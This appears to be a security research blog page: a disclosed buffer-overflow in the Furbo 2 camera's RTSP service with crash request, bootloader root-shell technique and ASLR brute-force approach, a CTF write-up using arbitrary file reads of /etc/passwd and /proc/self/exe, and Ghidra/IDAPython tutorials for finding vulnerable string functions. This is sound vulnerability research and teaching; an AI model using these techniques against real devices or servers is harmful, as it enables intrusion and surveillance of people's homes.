Hacking the Furbo Dog Camera: Part I

DSC_0773.JPG

The Furbo is a treat-tossing dog camera that originally started gaining traction on Indegogo in 2016. Its rapid success on the crowdfunding platform led to a public release later that year. Now the Furbo is widely available at Chewy and Amazon, where it has been a #1 best seller. The Furbo offers 24/7 camera access via its mobile application, streaming video and two-way audio. Other remote features include night vision, dog behavior monitoring, emergency detection, real-time notifications, and the ability to toss a treat to your dog. Given the device's vast feature set and popularity, Somerset Recon purchased several Furbos to research their security. This blog post documents a vulnerability discovered in the RTSP server running on the device. The research presented here pertains to the Furbo model: Furbo 2.

Once we got our hands on a couple of Furbos we began taking a look at the attack surface. Initially, the Furbo pairs with a mobile application on your phone via Bluetooth Low Energy (BLE), which allows the device to connect to your local WiFi network. With the Furbo on the network a port scan revealed that ports 554 and 19531 were listening. Port 554 is used for RTSP which is a network protocol commonly used for streaming video and audio. Initially the RTSP service on the Furbo required no authentication and we could remotely view the camera feed over RTSP using the VLC media player client. However, after an update and a reset the camera required authentication to access the RTSP streams. 

The RTSP server on the Furbo uses HTTP digest authentication. This means that when connecting with an RTSP client, the client needs to authenticate by providing a username and password. The client utilizes a realm and nonce value sent by the server to generate an authentication header, which gets included in the request. With this in mind, we decided to try to identify a vulnerability in the RTSP service.

Crash

The crash was discovered by manually fuzzing the RTSP service. A common tactic in discovering stack or heap overflows is sending large inputs, so we fired off some requests with large usernames and much to our delight we saw the RTSP service reset. We eventually determined that a username of over 132 characters resulted in the RTSP service crashing due to improper parsing of the authentication header. An example request can be seen below:

DESCRIBE rtsp://192.168.1.85:554/stream RTSP/1.0\r\n
CSeq: 7\r\n
Authorization: Digest username="AAAAAAAAAAAAAAAAAAAAAAA<+500>", realm="chicony.com", nonce="40b5d14d3bb07ca3", uri="rtsp://192.168.1.85:554/stream", response="981c9a2611617e5faf11be29407a4b8e"\r\n

At this point we wanted to obtain shell access on the Furbo to triage the crash and develop an exploit. To do so we shifted gears and took a look at the hardware.

Reverse Engineering Hardware to Gain Root Access

An important and helpful first step in attacking the Furbo, and most IoT devices, is obtaining a root shell or some other internal access to the device. Doing so can help elucidate processes, data, or communication which are otherwise obfuscated or encrypted. We focused our efforts on gaining root access to the Furbo by directly attacking the hardware which contains several interconnected printed circuit boards (PCBs). There are three PCBs that we analyzed.

The back PCB contains the reset switch and USB Micro-B port, which can be used to power the Furbo as show here:

DSC_0550.jpg

Note the non-populated chips and connectors. We traced these to see if any of them provided serial access, but they turned out to link to the USB controller’s D+ and D- lines. These connectors are probably used during manufacturing for flashing, but they did not give us the serial access we were searching for.

The central PCB acts as the hub connecting other PCBs as shown here:

DSC_0592_brighter.jpg

It contains relays, power regulators, an adjustment potentiometer, and a PIC16F57. Based on initial reverse engineering, this chip appears to control physical components such as the LED status bar, the treat shooter, and the mechanical switch that detects the treat shooter's motion.

The top PCB of the Furbo contains the large, visible-wavelength camera as shown here:

DSC_0577.jpg
DSC_0583.jpg

The board shown above supports Wi-Fi and Bluetooth, as evidenced by the connected patch antenna located on the side of the Furbo. The PCB also contains the main System on Chip (SoC) which performs the high level functions of the Furbo. The SoC is an Ambarella S2Lm.

The Ambarella SoC is the primary target: as a highly-capable ARM Cortex-A9 SoC running Linux (compared to the fairly limited PIC16 and wireless chips), it likely performs all the important functions of the Furbo, and hopefully contains an accessible TTY shell (serial access). As with many new complex or custom SoCs, detailed datasheets and specifications for the Ambarella chips are difficult to find. Instead we attached a Logic Analyzer to various test points until we located the UART TTY TX pin with a baud rate of 115200. From here we found the receive (RX) pin by connecting an FTDI to adjacent pins until a key press was registered on the serial terminal. The resulting serial access test points were located on the bottom left of the board as shown in the figure below:

DSC_0583_lines.png

We soldered on some wires to the test points circled above and had reliable serial access to the Ambarella SoC. The resulting boot log sequence is seen here: 

As we can see above, the boot log sequence starts with the AMBoot bootloader. It is similar to Das U-Boot, but custom built by Ambarella. It will load images from NAND flash, and then boot the Linux v3.10.73 kernel. In the boot log note the line indicating the parameters used by AMBoot to initiate the Linux kernel:

[0.000000] Kernel command line: console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/linuxrc video=amb0fb:720x480,720x480,1,0

The Linux terminal is protected by login credentials, but the process can be interrupted causing the Furbo to enter the AMBoot bootloader. See here for a similar demonstration of accessing a root shell from AMBoot. For the Furbo this can be done by pressing Enter at the TTY terminal immediately after reset, leading to the AMBoot terminal shown here:

amboot> boot console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/bin/sh video=amb0fb:720x480,720x480,1,0

Utilizing the AMBoot “boot” command with init=/bin/sh, as shown above, will bypass the Linux login prompt and boot directly into a root shell. The result of which can be seen here:

Once a root shell is accessible, a persistent root user can be created by adding or modifying entries in /etc/passwd and /etc/shadow. This persistent root shell can then be accessed via the normal Linux login prompt.

Debugging & Reverse Engineering

Now that we had shell access to the device, we looked around and got an understanding of how the underlying services work. An executable named apps_launcher is used to launch multiple services, including the rtsp_svc (RTSP server). These processes are all monitored by a watchdog script and get restarted if one crashes. We found that manually starting the apps_launcher process revealed some promising information.

It was here that we noticed that service rtsp_svc seemed to segfault twice before fully crashing. Note the segfault addresses are set to 0x41414141 indicating a successful buffer overflow, and the possibility of controlling program flow. To do so we needed to start the process of debugging and reversing the RTSP service crash.

From the information gathered so far, we were fairly confident we had discovered an exploitable condition. We added statically compiled dropbear-ssh and gdbserver binaries to the Furbo to aid in debugging and dove in. We connected to gdbserver on the Furbo from a remote machine using gdb-multiarch and GEF and immediately saw that we had a lot to work with:

500_As_gdb.png

Note that the presence of the username's "A"'s throughout, implying that the contents of the program counter ($pc), stack ($sp), and registers $r4 through $r11 could be controlled. Using a cyclic pattern for the username indicated the offset of each register that could be controlled. For example, the offset of the program counter was found to be 164 characters.

The link register ($lr) indicates that the issue is found in the parse_authenticaton_header() function. This function was located in the libamprotocol-rtsp.so.1 file. We pulled this file off of the Furbo to take a look at what was happening. Many of the file and function names utilized by the RTSP service indicate that they are part of the Ambarella SDK. Below is a snippet of the vulnerable function decompiled with Ghidra.

... snippet start ...
  
  size_t sizeof_str;
  int int_result;
  size_t value_len;
  undefined4 strdupd_value;
  int req_len_;
  char *req_str_;
  char parameter [128];
  char value [132];
  char update_req_str;

... removed for brevity ...

      while( true ) {
        memset(parameter,0,0x80);
        memset(value,0,0x80);
        int_result = sscanf(req_str_,"%[^=]=\"%[^\"]\"",parameter); //ghidra missed value argument here
        if ((int_result != 2) &&
           (int_result = sscanf(req_str_,"%[^=]=\"\"",parameter), int_result != 1)) break;
        sizeof_str = strlen(parameter);
        if (sizeof_str == 8) {
          int_result = strcasecmp(parameter,"username");
          if (int_result == 0) {
            if (*(void **)(header + 0xc) != (void *)0x0) {
              operator.delete[](*(void **)(header + 0xc));
            }
            strdupd_value = amstrdup(value);
            *(undefined4 *)(header + 0xc) = strdupd_value;
            sizeof_str = strlen(parameter);
          }

... snippet end ...

Assuming we have sent a request with a username full of ”A’s”, when it first hits the snippet shown, it will have stripped off everything in the request up until the username parameter. Note req_str_ in the highlighted section is a pointer to username="AAAAAAAAAA<+500>".

It’s worth mentioning that Ghidra appeared to misinterpret the arguments for sscanf() in this instance, as there should be two locations listed: parameter and value. The first format specifier parses out the parameter name such as username and stores it in parameter. The second format specifier copies the actual parameter value such as AAAAAAAAAAA and stores it in the location of value, which is only allocated 132 bytes. There is no length check, resulting in the buffer overflowing. When the function returns the service crashes as the return address was overwritten with the characters from the overflowed username in *req_str.

Additional information was gathered to craft a working PoC. The camera uses address space layout randomization (ASLR) and the shared objects were compiled with no-execute (NX). The rtsp_svc binary was not compiled with the position-independent executable (PIE) flag; however, the address range for the executable contains two leading null bytes (0x000080000) which unfortunately cannot be included in the payload. This means utilizing return-oriented programming (ROP) in the text section to bypass ASLR would be difficult, so we aimed to find another way.

Proof of Concept

As part of the triaging process, we disabled ASLR to see if we could craft a working exploit. With just 3 ROP gadgets from libc, we were able to gain code execution:

From here, we still wanted to find a way to exploit this with no prior access to the device (when ASLR is enabled). Ideally, we would have found some way to leak an address, but we did not find a way to accomplish that given the time invested.

As mentioned earlier, one of the behaviors we noticed was that the rtsp_svc executable would stay running after the first malformed payload, and would not fully crash until the second. Additionally, after the second request, the RTSP service would reset and the RTSP service would come back up. We confirmed this was because the rtsp_svc is run with a watchdog script. 

Next, we checked the randomness of the libc address each time the service is run and found that 12 bits were changing. The addresses looked something like 0x76CXX000 where XX varied and sometimes the highlighted C would be a D. Taking all this into account, we crafted an exploit with two hardcoded libc base addresses that would be tried over and over again until the exploit was successful. If we consider that 12 bits can change between resets, there is a 1 in 4096 chance for the exploit to work. So we patiently waited as shown in the picture below:

bo_watin_for_shellz.JPG

In testing, it took anywhere from 2 minutes to 4 hours. Occasionally, the rtsp_svc executable would end up in a bad state requiring a full power cycle by unplugging the camera. This did not seem to happen after initial discovery, however since that time, multiple firmware updates have been issued to the Furbo (none fixed the vulnerability), which may have something to do with that behavior. Below is a screenshot showing the exploit running against an out of the box Furbo 2 and successfully gaining a shell:

aslr_shell.png

Finally, here is a video demonstrating the exploit in action side-by-side with a Furbo. To create a more clear and concise video the demo below was executed with ASLR disabled.

We’ve made all the code available in our github repository if you want to take a look or attempt to improve the reliability!

Disclosure

Given the impact of this vulnerability we reached out to the Furbo Security Team. Here is the timeline of events for this discovery.


Event Date
Vulnerability discovered 05/01/2020
Vulnerability PoC 08/01/2020
Disclosed Vulnerability to Furbo Security Team 08/14/2020
Escalated to Ambarella (according to Furbo Team) 8/19/2020
Last communication received from Furbo Security Team 8/20/2020
Applied for CVE 8/21/2020
Check In with Furbo for Update (No Response) 8/28/2020
Assigned CVE-2020-24918 8/30/2020
Check In with Furbo for Update (No Response) 9/8/2020
Check In with Furbo for Update (No Response) 10/20/2020
Additional Attempt to Contact Furbo (No Response) 3/19/2021
Published Blog Post 4/26/2021

As you can see, after exchanging emails sharing the details of the vulnerability with the Furbo Security Team, communications soon dropped off. Multiple follow up attempts went unanswered. The Furbo Security Team indicated that they had notified Ambarella of the vulnerability, but never followed up with us. Our own attempts to contact Ambarella directly went unanswered. At the time of posting, we are still looking to get in contact with Ambarella. This buffer overflow likely exists in the Ambarella SDK, which could potentially affect other products utilizing Ambarella chipsets.

Conclusion

The Furbo 2 has a buffer overflow in the RTSP Service when parsing the RTSP authentication header. Upon successful exploitation, the attacker is able to execute code as root and take full control of the Furbo 2. There are many features that can be utilized from the command line including, but not limited to, recording audio and video, playing custom sounds, shooting out treats, and obtaining the RTSP password for live video streaming.

Since the discovery of this exploit the Furbo has had multiple firmware updates, but they do not appear to have patched the underlying RTSP vulnerability. The reliability of our exploit has decreased because the RTSP service on the test devices more frequently goes into a bad state requiring the device to be fully power cycled before continuing. Additionally, Tomofun has released the Furbo 2.5T. This new model has upgraded hardware and is running different firmware. While the buffer overflow vulnerability was not fixed in code, the new Furbo 2.5T model no longer restarts the RTSP service after a crash. This mitigation strategy prevents us from brute-forcing ASLR, and prevents our currently released exploit from running successfully against Furbo 2.5T devices.

After realizing how much the Furbo 2.5T changed, we decided to reassess the new devices. We found a host of new vulnerabilities that will be the focus of Hacking the Furbo Dog Camera: Part II!

Here’s a bonus video featuring Sonny the Golden Retriever!

Posted on April 26, 2021 .

LayerOne 2019 CTF - LogViewer

The LayerOne Capture The Flag (CTF) event is a traditional security competition hosted by the folks at Qualcomm at the LayerOne Security Conference. There were various challenges ranging in difficulty that required competitors to uncover flags by exploiting security vulnerabilities. This is a quick write up of one of the more complex challenges (LogViewer):

Part I

The first part of the challenge asked competitors to calculate the SHA-256 hash of the web service binary running on the CTF server. The provided URL displayed the following page:

image7.png

The page was a simple form with an input field. Trying different inputs revealed that the form returned the content of the file provided. As an example, the contents of /etc/passwd was read as it is typically world-readable on a Linux system:

image14.png

The web service allowed an arbitrary read of a user defined file on the server. Theoretically we could use this vulnerability to download the web service binary itself, but there was a challenge with this approach: we did not know the correct path to the web service binary.

This was solved by looking through /proc. On typical Linux systems there are a few symlinks under /proc; notably /proc/self, which links to the process that’s reading /proc/self. So accessing /proc/self through the web service will point to the web service process.

Note that every process running on a Linux system is represented by a directory under /proc (named after the pid). Each of these directories contains a set of typical directories and links. Notably the symlink exe is a link to the currently-running program. The following is a set of details of /exe from the proc man page:

image1.png

Thus by accessing /proc/self/exe via the web form input we were able to download the web service binary directly:

image5.png

After saving the binary we calculated the SHA-256 hash of the file and captured the flag:

Flag: 04c0bd03d648ea2bee457cb86e952bd7d72bda35805b2e6576bafa2c1d270d90

Part II

The second part of this challenge was to read the /flag.txt file on the CTF server by using the web service binary we obtained in Part I.

In order to begin reversing of the web service binary, we pulled the HTML file from the challenge website and set it up on a local test environment. When we first ran the program in Ubuntu 18.04 and tried to read /flag.txt using the webform, it returned the following error:

image11.png

This error message told us that the program was expecting to read the file /etc/alpine-release and use it somehow. To verify this, we created a docker container running Alpine Linux. After setting up the container, we got the following response from accessing the flag file:

A password was required (via GET parameters) to access the flag file and we had to figure out this password by reverse engineering the web service binary.

The binary was written in Go and was statically linked, making it a bit messy to view in IDA Pro. After we annotated and analyzed various functions, we reached the following conclusion regarding program flow:

The program first reads the form input and checks if it contains /flag.txt. If the user input does contain /flag.txt, it would check the password provided by the user and return its content if the password is correct. Otherwise, it would return the content of the user-specified file if it is present on the system.

Looking at the checkPassword functions, there were several cmp instructions that checked for the total length and byte values in the password. The following are the constraints for the password:

Constraint 1: The length of the password is at least 7 bytes (cmp rdx, 7)

image2.png

Constraint 2: The 4th and 6th bytes of the password must be equal (cmp [rax+06], cl)

image10.png

Constraint 3: The 1st byte of the password must be c (cmp BYTE PTR [rsp+0x3f], dl)

Constraint 4: The 3rd byte of the password must be e (cmp BYTE PTR [rsp+0x3f],cl)

Constraint 5: The 0th byte of the password must be Z (cmp BYTE PTR [rax], 0x5a)

Constraint 6: The 4th byte of the password must be x (cmp BYTE PTR [rax+4], 0x78)

Constraint 7: The 2nd byte of the password must be # (cmp BYTE PTR [rsp+0x3f], cl)

Constraint 8: The password’s 4th byte cannot be equal to the 5th byte plus 5 (cmp BYTE PTR [rsp+0x5],cl)

Constraint 9: The length of the password must be at least 9 bytes:

Constraint 10: The password’s third and fourth bytes have to be equal to the last two bytes:

To summarize all constraints:

  1. Must be at least 7 bytes

  2. Byte 4 and 6 must be equal

  3. Byte 1 must be c

  4. Byte 3 must be e

  5. Byte 0 must be Z

  6. Byte 4 must be x

  7. Byte 2 must be #

  8. Byte 4 must not be equal to byte 5 + 5 more chars

  9. Must be at least 9 bytes

  10. Bytes 3 and 4 must be equal to the last two bytes

After many trials and errors, we came up with the following form of the password: 

Zc#exZx#e

Given this will be passed as a GET parameter it was important for us to URL-encode the “#” character as it would otherwise be interpreted as a fragment identifier.

After generating the password we queried the CTF server with the following encoded payload:

https://exeter.d53b608415a7222c.ctf.land?path=/flag.txt&password=Zc%23exZx%23e

Accessing the URL above gave us the flag:

Flag: EngineeringFlagReversingReversed

And such is the story of the LogViewer challenge. We really enjoyed capturing this multifaceted flag, and we had a blast competing at the LayerOne CTF. Thanks again to the organizers of the conference and CTF. We are looking forward to the next one.

Posted on August 16, 2019 .

Ghidra Plugin Development for Vulnerability Research - Part-1

Overview

On March 5th at the RSA security conference, the National Security Agency (NSA) released a reverse engineering tool called Ghidra. Similar to IDA Pro, Ghidra is a disassembler and decompiler with many powerful features (e.g., plugin support, graph views, cross references, syntax highlighting, etc.). Although Ghidra's plugin capabilities are powerful, there is little information published on its full capabilities.  This blog post series will focus on Ghidra’s plugin development and how it can be used to help identify software vulnerabilities.

In our previous post, we leveraged IDA Pro’s plugin functionality to identify sinks (potentially vulnerable functions or programming syntax).  We then improved upon this technique in our follow up blog post to identify inline strcpy calls and identified a buffer overflow in Microsoft Office. In this post, we will use similar techniques with Ghidra’s plugin feature to identify sinks in CoreFTPServer v1.2 build 505.

Ghidra Plugin Fundamentals

Before we begin, we recommend going through the example Ghidra plugin scripts and the front page of the API documentation to understand the basics of writing a plugin. (Help -> Ghidra API Help)

When a Ghidra plugin script runs, the current state of the program will be handled by the following five objects:

  • currentProgram: the active program

  • currentAddress: the address of the current cursor location in the tool

  • currentLocation: the program location of the current cursor location in the tool, or null if no program location exists

  • currentSelection: the current selection in the tool, or null if no selection exists

  • currentHighlight: the current highlight in the tool, or null if no highlight exists

It is important to note that Ghidra is written in Java, and its plugins can be written in Java or Jython. For the purposes of this post, we will be writing a plugin in Jython. There are three ways to use Ghidra’s Jython API:

  • Using Python IDE (similar to IDA Python console):

  • Loading a script from the script manager:

  • Headless - Using Ghidra without a GUI:

ghidra_output4.png

With an understanding of Ghidra plugin basics, we can now dive deeper into the source code by utilizing the script manager (Right Click on the script -> Edit with Basic Editor)

The example plugin scripts are located under /path_to_ghidra/Ghidra/Features/Python/ghidra_scripts. (In the script manager, these are located under Examples/Python/):

ghidra_output6.png


Ghidra Plugin Sink Detection

In order to detect sinks, we first have to create a list of sinks that can be utilized by our plugin. For the purpose of this post, we will target the sinks that are known to produce buffer overflow vulnerabilities. These sinks can be found in various write-ups, books, and publications.

Our plugin will first identify all function calls in a program and check against our list of sinks to filter out the targets. For each sink, we will identify all of their parent functions and called addresses. By the end of this process, we will have a plugin that can map the calling functions to sinks, and therefore identify sinks that could result in a buffer overflow.

Locating Function Calls

There are various methods to determine whether a program contains sinks. We will be focusing on the below methods, and will discuss each in detail in the following sections:

  1. Linear Search - Iterate over the text section (executable section) of the binary and check the instruction operand against our predefined list of sinks.

  2. Cross References (Xrefs) - Utilize Ghidra’s built in identification of cross references and query the cross references to sinks.

Linear Search

The first method of locating all function calls in a program is to do a sequential search. While this method may not be the ideal search technique, it is a great way of demonstrating some of the features in Ghidra’s API.

Using the below code, we can print out all instructions in our program:

listing = currentProgram.getListing() #get a Listing interface
ins_list = listing.getInstructions(1) #get an Instruction iterator
while ins_list.hasNext():             #go through each instruction and print it out to the console
    ins = ins_list.next()
    print (ins)

Running the above script on CoreFTPServer gives us the following output:

ghidra_output7.png

We can see that all of the x86 instructions in the program were printed out to the console.


Next, we filter for sinks that are utilized in the program. It is important to check for duplicates as there could be multiple references to the identified sinks.

Building upon the previous code, we now have the following:

sinks = [ 
         "strcpy",
         "memcpy",
         "gets",
         "memmove",
         "scanf",
         "lstrcpy",
         "strcpyW",
         #...
         ]
duplicate = []
listing = currentProgram.getListing() 
ins_list = listing.getInstructions(1) 
while ins_list.hasNext():           
    ins = ins_list.next()    
    ops = ins.getOpObjects(0)    
    try:        
        target_addr = ops[0]  
        sink_func = listing.getFunctionAt(target_addr) 
        sink_func_name = sink_func.getName()         
        if sink_func_name in sinks and sink_func_name not in  duplicate:
            duplicate.append(sink_func_name) 
            print (sink_func_name,target_addr) 
    except:
        pass    


Now that we have identified a list of sinks in our target binary, we have to locate where these functions are getting called. Since we are iterating through the executable section of the binary and checking every operand against the list of sinks, all we have to do is add a filter for the call instruction.

Adding this check to the previous code gives us the following:

sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

#iterate through each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    mnemonic = ins.getMnemonicString()

    #check to see if the instruction is a call instruction
    if mnemonic == "CALL":
        try:
            target_addr = ops[0]
            sink_func = listing.getFunctionAt(target_addr)
            sink_func_name = sink_func.getName()
            #check to see if function being called is in the sinks list
            if sink_func_name in sinks and sink_func_name not in duplicate:
                duplicate.append(sink_func_name)
                print (sink_func_name,target_addr)
        except:
	        pass

Running the above script against CoreFTPServer v1.2 build 505 shows the results for all detected sinks:

ghidra_output8.png

Unfortunately, the above code does not detect any sinks in the CoreFTPServer binary. However, we know that this particular version of CoreFTPServer is vulnerable to a buffer overflow and contains the lstrcpyA sink. So, why did our plugin fail to detect any sinks?

After researching this question, we discovered that in order to identify the functions that are calling out to an external DLL, we need to use the function manager that specifically handles the external functions.

To do this, we modified our code so that every time we see a call instruction we go through all external functions in our program and check them against the list of sinks. Then, if they are found in the list, we verify whether that the operand matches the address of the sink.

The following is the modified section of the script:

sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

program_sinks = {}
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)
ext_fm = fm.getExternalFunctions()

#iterate through each of the external functions to build a dictionary
#of external functions and their addresses
while ext_fm.hasNext():
    ext_func = ext_fm.next()
    target_func = ext_func.getName()
   
    #if the function is a sink then add it's address to a dictionary
    if target_func in sinks: 
        loc = ext_func.getExternalLocation()
        sink_addr = loc.getAddress()
        sink_func_name = loc.getLabel()
        program_sinks[sink_addr] = sink_func_name

#iterate through each instruction 
while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    mnemonic = ins.getMnemonicString()

    #check to see if the instruction is a call instruction
    if mnemonic == "CALL":
        try:
            #get address of operand
            target_addr = ops[0]   
            #check to see if address exists in generated sink dictionary
            if program.sinks.get(target_addr):
                print (program_sinks[target_addr], target_addr,ins.getAddress()) 
        except:
            pass

Running the modified script against our program shows that we identified multiple sinks that could result in a buffer overflow.

ghidra_output9.png


Xrefs

The second and more efficient approach is to identify cross references to each sink and check which cross references are calling the sinks in our list. Because this approach does not search through the entire text section, it is more efficient.

Using the below code, we can identify cross references to each sink:


sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

duplicate = []
func = getFirstFunction()

while func is not None:
    func_name = func.getName()
    
    #check if function name is in sinks list
    if func_name in sinks and func_name not in duplicate:
        duplicate.append(func_name)
        entry_point = func.getEntryPoint()
        references = getReferencesTo(entry_point)
	#print cross-references    
        print(references)
    #set the function to the next function
    func = getFunctionAfter(func)

Now that we have identified the cross references, we can get an instruction for each reference and add a filter for the call instruction. A final modification is added to include the use of the external function manager:

sinks = [					
	"strcpy",
	"memcpy",
	"gets",
	"memmove",
	"scanf",
	"strcpyA", 
	"strcpyW", 
	"wcscpy", 
	"_tcscpy", 
	"_mbscpy", 
	"StrCpy", 
	"StrCpyA",
        "lstrcpyA",
        "lstrcpy", 
        #...
	]

duplicate = []
fm = currentProgram.getFunctionManager()
ext_fm = fm.getExternalFunctions()

#iterate through each external function
while ext_fm.hasNext():
    ext_func = ext_fm.next()
    target_func = ext_func.getName()
    
    #check if the function is in our sinks list 
    if target_func in sinks and target_func not in duplicate:
        duplicate.append(target_func)
        loc = ext_func.getExternalLocation()
        sink_func_addr = loc.getAddress()    
        
        if sink_func_addr is None:
            sink_func_addr = ext_func.getEntryPoint()

        if sink_func_addr is not None:
            references = getReferencesTo(sink_func_addr)

            #iterate through all cross references to potential sink
            for ref in references:
                call_addr = ref.getFromAddress()
                ins = listing.getInstructionAt(call_addr)
                mnemonic = ins.getMnemonicString()

                #print the sink and address of the sink if 
                #the instruction is a call instruction
                if mnemonic == “CALL”:
                    print (target_func,sink_func_addr,call_addr)

Running the modified script against CoreFTPServer gives us a list of sinks that could result in a buffer overflow:

ghidra_output9.png



Mapping Calling Functions to Sinks

So far, our Ghidra plugin can identify sinks. With this information, we can take it a step further by mapping the calling functions to the sinks. This allows security researchers to visualize the relationship between the sink and its incoming data. For the purpose of this post, we will use graphviz module to draw a graph.

Putting it all together gives us the following code:

from ghidra.program.model.address import Address
from ghidra.program.model.listing.CodeUnit import *
from ghidra.program.model.listing.Listing import *

import sys
import os

#get ghidra root directory
ghidra_default_dir = os.getcwd()

#get ghidra jython directory
jython_dir = os.path.join(ghidra_default_dir, "Ghidra", "Features", "Python", "lib", "Lib", "site-packages")

#insert jython directory into system path 
sys.path.insert(0,jython_dir)

from beautifultable import BeautifulTable
from graphviz import Digraph


sinks = [
    "strcpy",
    "memcpy",
    "gets",
    "memmove",
    "scanf",
    "strcpyA", 
    "strcpyW", 
    "wcscpy", 
    "_tcscpy", 
    "_mbscpy", 
    "StrCpy", 
    "StrCpyA", 
    "StrCpyW", 
    "lstrcpy", 
    "lstrcpyA", 
    "lstrcpyW", 
    #...
]

sink_dic = {}
duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

#iterate over each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    mnemonic = ins.getMnemonicString()
    ops = ins.getOpObjects(0)
    if mnemonic == "CALL":	
        try:
            target_addr = ops[0]
            func_name = None 
            
            if isinstance(target_addr,Address):
                code_unit = listing.getCodeUnitAt(target_addr)
                if code_unit is not None:
                    ref = code_unit.getExternalReference(0)	
                    if ref is not None:
                        func_name = ref.getLabel()
                    else:
                        func = listing.getFunctionAt(target_addr)
                        func_name = func.getName()

            #check if function name is in our sinks list
            if func_name in sinks and func_name not in duplicate:
                duplicate.append(func_name)
                references = getReferencesTo(target_addr)
                for ref in references:
                    call_addr = ref.getFromAddress()
                    sink_addr = ops[0]
                    parent_func_name = getFunctionBefore(call_addr).getName()

                    #check sink dictionary for parent function name
                    if sink_dic.get(parent_func_name):
                        if sink_dic[parent_func_name].get(func_name):
                            if call_addr not in sink_dic[parent_func_name][func_name]['call_address']:
                                sink_dic[parent_func_name][func_name]['call_address'].append(call_addr)
                            else:
                                sink_dic[parent_func_name] = 
                    else:	
                        sink_dic[parent_func_name] = 				
        except:
            pass

#instantiate graphiz
graph = Digraph("ReferenceTree")
graph.graph_attr['rankdir'] = 'LR'
duplicate = 0

#Add sinks and parent functions to a graph	
for parent_func_name,sink_func_list in sink_dic.items():
    #parent functions will be blue
    graph.node(parent_func_name,parent_func_name, style="filled",color="blue",fontcolor="white")
    for sink_name,sink_list in sink_func_list.items():
        #sinks will be colored red
        graph.node(sink_name,sink_name,style="filled", color="red",fontcolor="white")
        for call_addr in sink_list['call_address']:
	    if duplicate != call_addr:					
                graph.edge(parent_func_name,sink_name, label=call_addr.toString())
                duplicate = call_addr	

ghidra_default_path = os.getcwd()
graph_output_file = os.path.join(ghidra_default_path, "sink_and_caller.gv")

#create the graph and view it using graphiz
graph.render(graph_output_file,view=True)

Running the script against our program shows the following graph:

ghidra_output10.png

We can see the calling functions are highlighted in blue and the sink is highlighted in red. The addresses of the calling functions are displayed on the line pointing to the sink.

After conducting some manual analysis we were able to verify that several of the sinks identified by our Ghidra plugin produced a buffer overflow. The following screenshot of WinDBG shows that EIP is overwritten by 0x42424242 as a result of an lstrcpyA function call.  

ghidra_output15.png

Additional Features

Although visualizing the result in a graph format is helpful for vulnerability analysis, it would also be useful if the user could choose different output formats.

The Ghidra API provides several methods for interacting with a user and several ways of outputting data. We can leverage the Ghidra API to allow a user to choose an output format (e.g. text, JSON, graph) and display the result in the chosen format. The example below shows the dropdown menu with three different display formats. The full script is available at our github:

ghidra_output11.png

Limitations

There are multiple known issues with Ghidra, and one of the biggest issues for writing an analysis plugin like ours is that the Ghidra API does not always return the correct address of an identified standard function.

Unlike IDA Pro, which has a database of function signatures (FLIRT signatures) from multiple libraries that can be used to detect the standard function calls, Ghidra only comes with a few export files (similar to signature files) for DLLs.  Occasionally, the standard library detection will fail.

ghidra_output12.png

By comparing IDA Pro and Ghidra’s disassembly output of CoreFTPServer, we can see that IDA Pro’s analysis successfully identified and mapped the function lstrcpyA using a FLIRT signature, whereas Ghidra shows a call to the memory address of the function lstrcpyA.

Although the public release of Ghidra has limitations, we expect to see improvements that will enhance the standard library analysis and aid in automated vulnerability research.

Conclusion

Ghidra is a powerful reverse engineering tool that can be leveraged to identify potential vulnerabilities. Using Ghidra’s API, we were able to develop a plugin that identifies sinks and their parent functions and display the results in various formats. In our next blog post, we will conduct additional automated analysis using Ghidra and enhance the plugins vulnerability detection capabilities.

Introduction to IDAPython for Vulnerability Hunting - Part 2

Overview

In our last post we reviewed some basic techniques for hunting vulnerabilities in binaries using IDAPython. In this post we will expand upon that work and extend our IDAPython script to help detect a real Microsoft Office vulnerability that was recently found in the wild. The vulnerability that will be discussed is a remote code execution vulnerability that existed in the Microsoft Office EQNEDT32.exe component which was also known as the Microsoft Office Equation Editor. This program was in the news in January when, due to a number of discovered vulnerabilities. Microsoft completely removed the application (and all of its functionality) from Microsoft Office in a security update. The vulnerabilities that ended up resulting in Equation Editor being killed are of the exact type that we attempted to identify with the script written in the previous blog post. However, calls to strcpy in the Equation Editor application were optimized out and inlined by the compiler, rendering the script that we wrote previously ineffective at locating the vulnerable strcpy usages.

While the techniques that we reviewed in the previous post are useful in finding a wide range of dangerous function calls, there are certain situations where the script as written in the previous blog post will not detect the dangerous programming constructs that we intend and would expect it to detect. This most commonly occurs when compiler optimizations are used which replace function calls to string manipulation functions (such as strcpy and strcat) with inline assembly to improve program performance. Since this optimization removes the call instruction that we relied upon in our previous blog post, our previous detection method does not work in this scenario. In this post we will cover how to identify dangerous function calls even when the function call itself has been optimized out of the program and inlined.

Understanding the Inlined strcpy()

Before we are able to find and detect inlined calls to strcpy, we first need to understand what an inlined strcpy would look like. Let us take a look at an IDA Pro screenshot below that shows the disassembly view side-by-side with the HexRays decompiler output of an instance where a call to strcpy is inlined.

Example of inlined strcpy() - Disassembly on left, HexRays decompiled version on right

Example of inlined strcpy() - Disassembly on left, HexRays decompiled version on right

